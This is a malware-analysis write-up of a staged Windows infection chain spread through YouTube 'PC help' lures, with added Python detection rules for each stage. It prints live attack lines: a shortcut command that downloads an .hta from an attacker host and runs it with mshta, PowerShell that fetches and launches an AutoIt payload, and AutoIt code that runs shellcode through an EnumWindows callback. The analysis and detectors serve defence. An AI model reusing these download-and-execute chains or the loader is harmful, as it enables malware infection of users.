Ongoing series: #1 #2 #3 #4 #5 #6
another youtube pc help update
After YouTube finally suspended several reported channels and videos, the campaign continued without changes for a long time. Then, there was a complete restructuring of the initial infection chain.
Download Lure
Instead of a direct download, the redirection from https://geeksupp[.]com was rewritten, and now it leads to a minimal website with a unique feature in the <head> tag:
<head>
<meta http-equiv="refresh" content="0; URL=search:query=lnstruction_856.pdf&crumb=location:\\download.instructionclubs.com@80\Downloads\&displayname=Downloads">
<link rel="icon" href="favicon.ico" type="image/x-icon">
</head>
The file name (SHA256:44A85A2846384CDC8E0BEB23977268E2E617A4C67CD8F8B4864A989F7EA68C39) was changed shortly after the adjustment to Doc_8147.pdf, but the rest remained the same. This leads the visitor from the redirection to a browser notification, prompting them to open Windows Explorer. If the user allows this action, a search window opens, supposedly looking for the PDF file, which appears to have been "found" in the Downloads folder. In reality, this is a remote share mounted by Windows Explorer. The file is actually a .lnk shortcut, but the .lnk extension is hidden from the user, and a PDF icon is displayed instead. Rather than opening a document as expected, the link is configured to download the next stage of the malware.
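The lure hinges on a meta refresh whose target is not an http(s) URL but a Windows search: URI whose crumb parameter points Explorer at a remote share. The following Python is an added example for a proxy or mail-gateway check, not code from the post: it parses the meta refresh, recognises the search: scheme, and extracts the remote host, port and path from the crumb. The lure page is reproduced from the snippet above; the benign page is a constructed control. The host@80 form is the WebDAV redirector syntax, which is why the finding records webdav_over_http.

```python
import re
from html.parser import HTMLParser

# Lure page reproduced from the post (host name as quoted there).
LURE_HTML = r"""<html><head>
<meta http-equiv="refresh" content="0; URL=search:query=lnstruction_856.pdf&crumb=location:\\download.instructionclubs.com@80\Downloads\&displayname=Downloads">
<link rel="icon" href="favicon.ico" type="image/x-icon">
</head><body></body></html>"""

# Constructed benign control: an ordinary HTTP redirect.
BENIGN_HTML = '<head><meta http-equiv="refresh" content="5; url=https://example.test/home"></head>'


class _RefreshTargets(HTMLParser):
    """Collect the URL part of every <meta http-equiv="refresh"> on a page."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag.lower() == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(.+)$", a.get("content", ""), re.I | re.S)
            if m:
                self.targets.append(m.group(1).strip())


def parse_search_uri(uri):
    """Split a Windows search: / search-ms: URI into lower-cased key -> value pairs, else None."""
    scheme, _, rest = uri.partition(":")
    if scheme.lower() not in ("search", "search-ms"):
        return None
    params = {}
    for part in rest.split("&"):
        key, _, value = part.partition("=")
        params[key.strip().lower()] = value
    return params


def remote_crumb_location(params):
    """Return (host, port, path) when the crumb points at a UNC / WebDAV location, else None."""
    m = re.match(r"location:\\\\([^\\@]+)(?:@(\d+))?(\\.*)?$", params.get("crumb", ""), re.I)
    if not m:
        return None
    host, port, path = m.group(1), m.group(2), m.group(3) or "\\"
    return host, int(port) if port else None, path


def assess_page(html):
    """One finding per meta refresh that hands the browser over to a remote search: share."""
    parser = _RefreshTargets()
    parser.feed(html)
    findings = []
    for target in parser.targets:
        params = parse_search_uri(target)
        if params is None:
            continue
        loc = remote_crumb_location(params)
        if loc is None:
            continue
        host, port, path = loc
        findings.append({
            "host": host,
            "port": port,
            "path": path,
            "shown_as": params.get("query", ""),       # file name the victim is shown
            "display_name": params.get("displayname", ""),
            "webdav_over_http": port == 80,             # \\host@80\ is served by the WebDAV client
        })
    return findings


if __name__ == "__main__":
    for finding in assess_page(LURE_HTML):
        print(finding)
    print(assess_page(BENIGN_HTML))
```

Blocking or alerting on any meta refresh into a search: / search-ms: URI with a remote crumb is a cheap control here, since legitimate sites have no reason to open Explorer against an external host.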
Executing the Shortcut (Stage 1)
Contrary to what the icon and name suggest, the shortcut does not point to a document but instead directs to the following path with corresponding parameters:
Icon=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Target=C:\Windows\System32\forfiles.exe
TargetArguments=/p C:\Windows\System32 /m cmmon32.exe /c "cmd /c powershell -w hidden -c \"iwr 'https://a3.bigdownloadtech.shop/webdav/reg/SHCORE' -o $env:TEMP\s.hta;start mshta $env:TEMP\s.hta\""
This shortcut and its arguments were also changed (SHA256:29C461188C5FE894D8A06DFDC6818FC286F434FFD7264B960949DEEAFFDD2C40) when the filename was updated.
TargetArguments=/p C:\Windows /m write.exe /c "powershell . \*i*\*2\msh*e https://a3.bigdownloadtech.shop/webdav/reg/BaristaBagging.json
However, the content of the downloaded file (SHA256:5436A830F3D34BF161B846DE94286967DDB63A0090B8AC59EA0CD3E066BF00BC) remained the same, despite the changed filename.
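Both shortcut variants above produce the same process tree on the endpoint: Explorer starts forfiles.exe, which proxies into cmd/powershell, which fetches and starts mshta. The following Python is an added example of the detection logic a SOC would run over process-creation telemetry; it is not code from the post. The events are constructed Sysmon-style records whose command lines are taken from the two TargetArguments quoted above, plus benign controls (an admin script and a routine forfiles log clean-up) that must not trigger.

```python
import re
from os.path import basename

# Constructed process-creation events (Sysmon event 1 style) replaying the chain above
# (shortcut -> forfiles.exe -> cmd -> powershell -> mshta) plus benign controls.
EVENTS = [
    {"pid": 4100, "ppid": 900,  "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4120, "ppid": 4100, "image": r"C:\Windows\System32\forfiles.exe",
     "cmdline": r'forfiles.exe /p C:\Windows\System32 /m cmmon32.exe /c "cmd /c powershell -w hidden -c iwr https://a3.bigdownloadtech.shop/webdav/reg/SHCORE -o $env:TEMP\s.hta;start mshta $env:TEMP\s.hta"'},
    {"pid": 4130, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c powershell -w hidden -c iwr https://a3.bigdownloadtech.shop/webdav/reg/SHCORE -o $env:TEMP\s.hta;start mshta $env:TEMP\s.hta"},
    {"pid": 4140, "ppid": 4130, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden -c iwr https://a3.bigdownloadtech.shop/webdav/reg/SHCORE -o $env:TEMP\s.hta;start mshta $env:TEMP\s.hta"},
    {"pid": 4150, "ppid": 4140, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta C:\Users\victim\AppData\Local\Temp\s.hta"},
    # second variant: wildcard-obfuscated path to mshta instead of a download cmdlet
    {"pid": 5190, "ppid": 4100, "image": r"C:\Windows\System32\forfiles.exe",
     "cmdline": r'forfiles.exe /p C:\Windows /m write.exe /c "powershell . \*i*\*2\msh*e https://a3.bigdownloadtech.shop/webdav/reg/BaristaBagging.json"'},
    {"pid": 5200, "ppid": 5190, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell . \*i*\*2\msh*e https://a3.bigdownloadtech.shop/webdav/reg/BaristaBagging.json"},
    # benign controls: an admin script and a legitimate forfiles log clean-up
    {"pid": 6000, "ppid": 4100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -File C:\Scripts\inventory.ps1"},
    {"pid": 7000, "ppid": 4100, "image": r"C:\Windows\System32\forfiles.exe",
     "cmdline": r'forfiles /p C:\Logs /m *.log /d -30 /c "cmd /c del @path"'},
    {"pid": 7010, "ppid": 7000, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd /c del C:\Logs\old.log"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def _base(path):
    return basename(path.replace("\\", "/")).lower()


def _ancestors(ev, by_pid, depth=3):
    """Yield up to `depth` parent events of ev (stops at an unknown pid)."""
    cur = ev
    for _ in range(depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None:
            return
        yield cur


def rule_forfiles_proxy_exec(ev, by_pid):
    """forfiles.exe abused as a proxy launcher: its /c argument starts a script host."""
    return (_base(ev["image"]) == "forfiles.exe"
            and re.search(r'/c\s+"?(cmd\s+/c\s+)?(powershell|pwsh|mshta|wscript|cscript)',
                          ev["cmdline"], re.I) is not None)


def rule_forfiles_ancestor(ev, by_pid):
    """A script host whose process tree passes through forfiles.exe within three hops."""
    return (_base(ev["image"]) in SCRIPT_HOSTS
            and any(_base(a["image"]) == "forfiles.exe" for a in _ancestors(ev, by_pid)))


def rule_hidden_download_exec(ev, by_pid):
    """Hidden-window PowerShell that downloads a file and immediately hands it to mshta/start/iex."""
    cl = ev["cmdline"].lower()
    return (_base(ev["image"]) in {"powershell.exe", "pwsh.exe"}
            and re.search(r"-w(indowstyle)?\s+hidden", cl) is not None
            and re.search(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", cl) is not None
            and re.search(r"\b(mshta|start|start-process|iex|invoke-expression)\b", cl) is not None)


def rule_wildcard_exe_path(ev, by_pid):
    r"""Executable path assembled from wildcards (\*i*\*2\msh*e) so the string 'mshta' never appears."""
    return (_base(ev["image"]) in {"powershell.exe", "pwsh.exe", "cmd.exe"}
            and re.search(r"\\\*[^\s\\]*\\", ev["cmdline"]) is not None)


def rule_mshta_temp_hta(ev, by_pid):
    """mshta.exe executing an .hta dropped in a user temp directory."""
    cl = ev["cmdline"].lower()
    return (_base(ev["image"]) == "mshta.exe"
            and re.search(r"(\\temp\\|%temp%|\$env:temp)[^\s\"]*\.hta\b", cl) is not None)


RULES = [rule_forfiles_proxy_exec, rule_forfiles_ancestor, rule_hidden_download_exec,
         rule_wildcard_exe_path, rule_mshta_temp_hta]


def evaluate(events):
    """Return {pid: [rule names]} for every event that triggers at least one rule."""
    by_pid = {ev["pid"]: ev for ev in events}
    hits = {}
    for ev in events:
        names = sorted(r.__name__[len("rule_"):] for r in RULES if r(ev, by_pid))
        if names:
            hits[ev["pid"]] = names
    return hits


if __name__ == "__main__":
    for pid, names in evaluate(EVENTS).items():
        print(pid, names)
```

The ancestor rule is what ties the second variant to the first: it has no hidden window and no download cmdlet, so only the forfiles.exe parentage and the wildcard path give it away, which is why a single keyword rule on "mshta" or "iwr" is not enough.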
HTML in the Executable (Stage 2)
As before, the downloaded file is an executable; however, it is not launched as such through the mshta call. Instead, the embedded JavaScript code is executed. This script, like previous iterations, is multi-layered with several encoding and encryption stages, eventually leading to a PowerShell script. There are small changes compared to previous versions, such as downloading a PDF file with no significant content and overwriting the local version of the lure, likely to cover tracks.
$gkpr = "https://files.catbox.moe/gdtf9h.pdf"
$lxwn = "$env:TEMP\lnstruction_856.pdf"
$tfqy = ('I'+'nvoke'+'-Web'+'Request')
$rvnm = ('Start'+'-Process')
& $tfqy -Uri $gkpr -OutFile $lxwn
if (Test-Path $lxwn) {
& $rvnm $lxwn
}
Additionally, an obfuscated AutoIt script config.bin (SHA256:FB1EC9AD8AF7681B6F217BE1131C0DA1DCA8105A81F1AE02A098457C05BE570A) is downloaded, along with the corresponding (legitimate) executable update.bin to run it.
$mn3 = "Aac3572MbHal.exe"
$r5q = -join ((65..90) + (97..122) | ForEach-Object { [char]$_ } | Get-Random -Count 8) + ".a3x"
$kl9 = Join-Path -Path $env:TEMP -ChildPath (-join ((48..57 | ForEach-Object { [char]$_ }) | Get-Random -Count 8))
New-Item -Path $kl9 -ItemType Directory -Force | Out-Null
$n2b = Join-Path -Path $kl9 -ChildPath $mn3
$j6m = Join-Path -Path $kl9 -ChildPath $r5q
$d8r = "https://a3.bigdownloadtech.shop/webdav/reg/update.bin"
$y7f = "https://a3.bigdownloadtech.shop/webdav/reg/config.bin"
Invoke-WebRequest -Uri $d8r -OutFile $n2b -UseBasicParsing
Invoke-WebRequest -Uri $y7f -OutFile $j6m -UseBasicParsing
Start-Process -FilePath $n2b -ArgumentList $j6m -NoNewWindow -Wait
$null = $mn3, $r5q, $kl9, $n2b, $j6m, $d8r, $y7f
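The two PowerShell fragments above share one shape: the cmdlet names are hidden (string concatenation plus the & call operator in the first, random variable names in both), a file is written by Invoke-WebRequest, and the same variable is then handed to Start-Process. The following Python is an added triage helper, not code from the post: it folds concatenated literals, resolves & $var to the literal it holds, and then links download targets to execution targets by variable name, so no path evaluation is needed. SCRIPT_A and SCRIPT_B are the two snippets quoted above; the regexes cover only the cmdlet spellings used there plus their common aliases.

```python
import re

# Stage-2 PowerShell quoted from the post: lure overwrite (A) and AutoIt dropper (B).
SCRIPT_A = r'''$gkpr = "https://files.catbox.moe/gdtf9h.pdf"
$lxwn = "$env:TEMP\lnstruction_856.pdf"
$tfqy = ('I'+'nvoke'+'-Web'+'Request')
$rvnm = ('Start'+'-Process')
& $tfqy -Uri $gkpr -OutFile $lxwn
if (Test-Path $lxwn) {
& $rvnm $lxwn
}'''

SCRIPT_B = r'''$mn3 = "Aac3572MbHal.exe"
$r5q = -join ((65..90) + (97..122) | ForEach-Object { [char]$_ } | Get-Random -Count 8) + ".a3x"
$kl9 = Join-Path -Path $env:TEMP -ChildPath (-join ((48..57 | ForEach-Object { [char]$_ }) | Get-Random -Count 8))
New-Item -Path $kl9 -ItemType Directory -Force | Out-Null
$n2b = Join-Path -Path $kl9 -ChildPath $mn3
$j6m = Join-Path -Path $kl9 -ChildPath $r5q
$d8r = "https://a3.bigdownloadtech.shop/webdav/reg/update.bin"
$y7f = "https://a3.bigdownloadtech.shop/webdav/reg/config.bin"
Invoke-WebRequest -Uri $d8r -OutFile $n2b -UseBasicParsing
Invoke-WebRequest -Uri $y7f -OutFile $j6m -UseBasicParsing
Start-Process -FilePath $n2b -ArgumentList $j6m -NoNewWindow -Wait
$null = $mn3, $r5q, $kl9, $n2b, $j6m, $d8r, $y7f'''

# A single-line string literal in either quote style.
STR_LIT = r"""(?:'[^'\n]*'|"[^"\n]*")"""
CONCAT_RE = re.compile(rf"\(?\s*{STR_LIT}(?:\s*\+\s*{STR_LIT})+\s*\)?")
ASSIGN_RE = re.compile(rf"^\s*\$(\w+)\s*=\s*({STR_LIT})\s*$", re.M)
DOWNLOAD_RE = re.compile(r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|curl|wget)\b[^\n]*?-(?:OutFile|o)\s+(\$\w+|\S+)", re.I)
EXEC_RE = re.compile(r"\b(?:Start-Process|saps)\b\s+(?:-FilePath\s+)?(\$\w+|\S+)", re.I)
ARGS_RE = re.compile(r"-ArgumentList\s+(\$\w+|\S+)", re.I)
CMDLET_RE = re.compile(r"\b(Invoke-WebRequest|Invoke-RestMethod|Start-Process|Invoke-Expression|New-Item)\b")


def fold_concatenations(text):
    """Join runs of concatenated literals: ('I'+'nvoke'+'-Web'+'Request') -> 'Invoke-WebRequest'."""
    def join(m):
        parts = re.findall(STR_LIT, m.group(0))
        return "'" + "".join(p[1:-1] for p in parts) + "'"
    return CONCAT_RE.sub(join, text)


def literal_assignments(text):
    """Map variable name -> literal for plain `$var = 'literal'` lines."""
    return {name: lit[1:-1] for name, lit in ASSIGN_RE.findall(text)}


def resolve_call_operator(text, env):
    """Replace `& $var` with the literal held in $var, exposing the real cmdlet name."""
    return re.sub(r"&\s*\$(\w+)", lambda m: env.get(m.group(1), m.group(0)), text)


def triage(script):
    """Summarise download/execute behaviour by tracking the variables that carry file paths."""
    folded = fold_concatenations(script)
    env = literal_assignments(folded)
    resolved = resolve_call_operator(folded, env)
    downloaded = set(DOWNLOAD_RE.findall(resolved))   # -OutFile targets
    executed = set(EXEC_RE.findall(resolved))         # Start-Process targets
    arguments = set(ARGS_RE.findall(resolved))        # Start-Process -ArgumentList values
    return {
        "cmdlets": sorted(set(CMDLET_RE.findall(resolved))),
        "urls": sorted(v for v in env.values() if re.match(r"https?://", v, re.I)),
        "downloaded": sorted(downloaded),
        "executed": sorted(executed),
        "download_then_execute": bool(downloaded & executed),
        "downloaded_file_as_argument": bool(downloaded & arguments),
    }


if __name__ == "__main__":
    print(triage(SCRIPT_A))
    print(triage(SCRIPT_B))
```

For SCRIPT_B the helper reports both that a downloaded file is executed and that a second downloaded file is passed to it as an argument, which is exactly the "legitimate interpreter plus script" pairing the text describes, without having to evaluate the random Join-Path names.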
AutoIt Script (Stage 3)
The subsequent stages have not changed. After successfully deobfuscating and decrypting the AutoIt script, the familiar pattern becomes apparent once again. The script extracts shellcode (SHA256:2199F67610A2E3BB5C3E207C90C3ADF17299A6DCA23F1CFEBF80A021684A5D79) from the script file, which is then executed via callback. This leads to the final payload being downloaded and executed.
DllStructCreate("byte[174460]")
DllCall("kernel32.dll","BOOL","VirtualProtect","ptr",DllStructGetPtr($pt),"int",174460 ,"dword",0x40,"dword*",null)
DllStructSetData($pt,1,$data)
DllCall("user32.dll","int","EnumWindows","ptr",DllStructGetPtr($pt),"lparam",0)
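The four AutoIt lines above are the whole execution primitive: a byte struct is allocated, VirtualProtect marks it PAGE_EXECUTE_READWRITE (0x40), the shellcode is copied in with DllStructSetData, and EnumWindows is handed the struct pointer as its callback, so the first enumerated window runs the shellcode. The following Python is an added example of a static check for that sequence in deobfuscated AutoIt source; it is not code from the post. The malicious sample reproduces the snippet above with a `$pt =` assignment added so it is a complete statement; the benign control uses the legitimate DllCallbackRegister/DllCallbackGetPtr route and must not be flagged.

```python
import re

# Constructed sample modelled on the Stage 3 snippet; the `$pt =` assignment is added here.
MALICIOUS_AU3 = r'''$pt = DllStructCreate("byte[174460]")
DllCall("kernel32.dll","BOOL","VirtualProtect","ptr",DllStructGetPtr($pt),"int",174460 ,"dword",0x40,"dword*",null)
DllStructSetData($pt,1,$data)
DllCall("user32.dll","int","EnumWindows","ptr",DllStructGetPtr($pt),"lparam",0)'''

# Constructed benign control: EnumWindows with a registered AutoIt callback, no protection change.
BENIGN_AU3 = r'''$hCb = DllCallbackRegister("_EnumProc", "bool", "hwnd;lparam")
DllCall("user32.dll","int","EnumWindows","ptr",DllCallbackGetPtr($hCb),"lparam",0)
DllCallbackFree($hCb)'''

# Win32 APIs that will call a caller-supplied function pointer (the callback-execution trick).
CALLBACK_APIS = {"enumwindows", "enumchildwindows", "enumdesktopwindows", "enumthreadwindows",
                 "enumfontfamiliesex", "enumsystemlocales", "enumuilanguages", "createthread",
                 "queueuserapc", "callwindowproc", "settimer", "enumdatetimeformats"}

# PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE = {0x10, 0x20, 0x40, 0x80}


def _int(tok):
    return int(tok, 16) if tok.lower().startswith("0x") else int(tok)


def analyse_autoit(src):
    """Find the struct-as-shellcode pattern: byte buffer -> VirtualProtect(RWX) -> copy -> callback API."""
    # $var = DllStructCreate("byte[N]")
    bufs = {name: int(size) for name, size in
            re.findall(r'\$(\w+)\s*=\s*DllStructCreate\(\s*"byte\[(\d+)\]"', src, re.I)}
    # VirtualProtect on a struct pointer: record size and requested protection per struct var
    rwx = {}
    for var, size, prot in re.findall(
            r'"VirtualProtect".*?DllStructGetPtr\(\$(\w+)\).*?"(?:int|ulong_ptr|dword)"\s*,\s*(\d+)\s*,\s*"dword"\s*,\s*(0x[0-9a-f]+|\d+)',
            src, re.I):
        rwx[var] = (int(size), _int(prot))
    # DllStructSetData($var, 1, ...) writes the payload into element 1 of the struct
    copied = set(re.findall(r"DllStructSetData\(\$(\w+)\s*,\s*1\s*,", src, re.I))
    # any DllCall passing DllStructGetPtr($var) as a "ptr" argument to a callback-taking API
    executors = [(api, var) for api, var in
                 re.findall(r'"(\w+)"\s*,\s*"ptr"\s*,\s*DllStructGetPtr\(\$(\w+)\)', src, re.I)
                 if api.lower() in CALLBACK_APIS]
    findings = []
    for api, var in executors:
        size, prot = rwx.get(var, (None, None))
        findings.append({
            "executor_api": api,
            "struct": "$" + var,
            "buffer_bytes": bufs.get(var),
            "protection": prot,
            "made_executable": prot is not None and prot in PAGE_EXECUTE,
            "size_matches_buffer": size is not None and size == bufs.get(var),
            "data_written": var in copied,
        })
    return findings


def is_shellcode_callback(findings):
    """True when a struct was made executable, filled, and passed as a callback pointer."""
    return any(f["made_executable"] and f["data_written"] for f in findings)


if __name__ == "__main__":
    for f in analyse_autoit(MALICIOUS_AU3):
        print(f)
    print(is_shellcode_callback(analyse_autoit(MALICIOUS_AU3)), analyse_autoit(BENIGN_AU3))
```

Matching the VirtualProtect size against the byte[N] declaration (174460 in both places here) is what separates this from ordinary AutoIt DllCall usage: legitimate scripts change page protection rarely and never on a struct they then hand to an Enum* API as a callback. On a live host the same sequence is visible as a VirtualProtect to an executable protection followed by a thread start outside any loaded module, which is the dynamic counterpart of this check.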